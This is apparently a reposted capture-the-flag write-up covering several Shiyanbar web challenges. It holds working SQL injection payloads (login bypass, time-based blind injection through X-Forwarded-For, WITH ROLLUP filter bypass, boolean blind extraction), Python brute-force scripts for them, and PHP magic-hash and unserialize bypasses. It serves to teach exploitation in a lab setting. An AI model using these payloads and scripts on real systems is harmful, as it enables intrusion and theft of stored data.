实验吧 (Shiyanbar) CTF

xiaoxiao 2021-02-28

登录一下好吗 (Please log in)

The `->` operator is called the "member access through pointer" operator; it exists in C and C++ and is used to access the members of a struct or object through a pointer to it. Log in with username -> `'='` and password -> `'='`. The SQL statement that normally runs is

select * from table where username = "$_POST['username']" and password = "$_POST['password']";

so the SQL statement our login executes is

select * from table where username = ''='' and password = ''='';

''='' always holds (NULL=NULL), which is equivalent to select * from table where 1 and 1;

who are you?

Time-based blind injection, in the X-Forwarded-For header. The main point is understanding the SQL statement:

'+(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1

The single quote closes the string, and everything after it is a conditional clause: case when ... then ... else ... end, and substring(... from ... for ...).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''Risk2S'''
# import the module packages
import requests
import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation
flag = ""

for i in range(1, 33):
    for ch in guess:
        # sent through X-Forwarded-For: sleep(5) fires only when the i-th flag character is ch
        headers = {"x-forwarded-for": "xx'+" + "(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" % (i, ch)}
        try:
            res = requests.get(url, headers=headers, timeout=4)
        except requests.exceptions.ReadTimeout:
            # a timeout means sleep(5) ran, so the guess was right
            flag = flag + ch
            print("flag:", flag)
            break
print('result:' + flag)

天网管理系统 (Skynet Management System)

In the source, the hint is <!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->. Scientific notation: 0exxx is 0. MD5 values that begin with 0e:

s878926199a 0e545993274517709034328855841020
s155964671a 0e342768416822451524974117254469
s214587387a 0e848240448830537924465865611904
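The loose comparison the hint relies on, as an added example that is not part of the writeup: a small Python model of PHP's `==` on numeric strings (the helper names are my own, not PHP's), showing why md5('s878926199a') == '0' holds and the strict, constant-time comparison that closes the hole.

```python
import hashlib
import hmac
import re

# Simplified model of PHP's numeric-string grammar (written for this example):
# optional sign, digits with optional fraction, optional exponent.
# "0e5459..." matches it and evaluates to 0 * 10^5459... = 0.
_PHP_NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")

def is_php_numeric(s: str) -> bool:
    return _PHP_NUMERIC.match(s) is not None

def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP == on two strings: when both are numeric strings they are
    compared as numbers (still the rule in PHP 8), otherwise byte for byte."""
    if is_php_numeric(a) and is_php_numeric(b):
        return float(a) == float(b)
    return a == b

def php_strict_equals(a: str, b: str) -> bool:
    """Model of PHP === on two strings: same bytes, no numeric conversion."""
    return a == b

def is_magic_hash(hexdigest: str) -> bool:
    """True when a hex digest is '0e' followed only by digits, i.e. a string
    that PHP's == treats as the number zero."""
    return hexdigest.startswith("0e") and hexdigest[2:].isdigit()

def vulnerable_check(username: str) -> bool:
    """The challenge's check, if(md5($test)=='0'), modelled with loose ==."""
    return php_loose_equals(hashlib.md5(username.encode()).hexdigest(), "0")

def hardened_check(username: str, expected_hex: str) -> bool:
    """The fix: compare the full expected digest strictly and in constant time
    (PHP's hash_equals or ===, never ==)."""
    digest = hashlib.md5(username.encode()).hexdigest()
    return hmac.compare_digest(digest, expected_hex)

if __name__ == "__main__":
    for name in ("s878926199a", "s155964671a", "s214587387a", "admin"):
        h = hashlib.md5(name.encode()).hexdigest()
        print(name, h, "magic" if is_magic_hash(h) else "normal",
              "loose == '0':", vulnerable_check(name))
```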

Go to /user.php?fame=hjkleffifer. The hint is

$unserialize_str = $_POST['password'];
$data_unserialize = unserialize($unserialize_str);
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') { print_r($flag); }

"The great scientist PHP said in dialect: bool makes you, and bool breaks you. Go home, kid." So: the serialize function, serialization; build the value locally in PHP:

<?php
$array1 = array('user' => true, 'pass' => true);
print_r(serialize($array1));
?>

This gives "a:2:{s:4:"user";b:1;s:4:"pass";b:1;}". Done: ctf{dwduwkhduw5465}

因缺思汀的绕过 (Interesting bypass)

The page source carries the hint <!--source: source.txt-->. The source:

<?php
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){
        print "水可载舟,亦可赛艇!";
        exit();
    }
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
    AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}
mysql_close($con);
?>

There are two nested ifs:

(mysql_num_rows($query) == 1) ($key['pwd'] == $_POST['pwd'])

So bypass them! The row count must be exactly 1, so use limit 1. We don't know pwd, so use

group by column with rollup ... offset number. The number can only be tried one by one; the last one is the one that works. (WITH ROLLUP appends a summary row whose pwd is NULL, and in PHP NULL == '' is true, which is why an empty pwd passes the second if.)

'or 1 group by pwd with rollup limit 1 offset 2#

CTF{with_rollup_interesting}. In Python:

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''Risk2S'''
# import the module packages
import requests

url = "http://ctf5.shiyanbar.com/web/pcat/index.php"
# the page checks (!isset($_POST['uname']) || !isset($_POST['pwd'])), so both keys must be sent
payload = {'uname': "'or 1 group by pwd with rollup limit 1 offset 2#", 'pwd': ""}
res = requests.post(url, data=payload)
print(res.text)

Even though pwd is empty, it must still be included in the POST dictionary.

简单的sql注入之3 (Simple SQL injection 3)

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''Risk2S'''
import requests
from urllib.parse import quote

flag = []
FLAG = False

def POC(x, i):
    url = 'http://ctf5.shiyanbar.com/web/index_3.php?id='
    # true when the ASCII code of flag character x equals i
    poc = "1'and+ascii(substr((select+flag+from+flag),%d,1))=%d#" % (x, i)
    # the writeup sends ',', '=' and '#' URL-encoded (written as %, %= %# in the original);
    # quote() does that here while leaving + ( ) ' untouched
    res = requests.get(url + quote(poc, safe="+()'"))
    # print('testing url:' + url + poc)  # test...
    if res.headers['Content-Length'] == '471':  # response length of a true condition
        return 1
    else:
        return 0

for x in range(1, 35):
    for i in range(32, 129):  # printable ASCII is 32-127
        if POC(x, i):
            flag.append(chr(i))  # chr() turns the integer into the matching ASCII character
            break
        elif i == 128:  # no character matched at this position, so stop
            FLAG = True
    if FLAG:
        break

# output the result as a string
get_flag = ''.join(flag)
print(get_flag)

The payload is 1'and+ascii(substr((select+flag+from+flag)%,%d%,1))%=%d%#, i.e. 1'and+ascii(substr((select+flag+from+flag),%d,1))=%d# with (x, i) substituted in. For each of the first to the 35th character it determines which ASCII code in 32-127 it is, converts that to a character and appends it to the flag: flag{Y0u_@r3_5O_dAmn_90Od}

Please credit the original URL when reposting: https://www.6miu.com/read-1247034.html
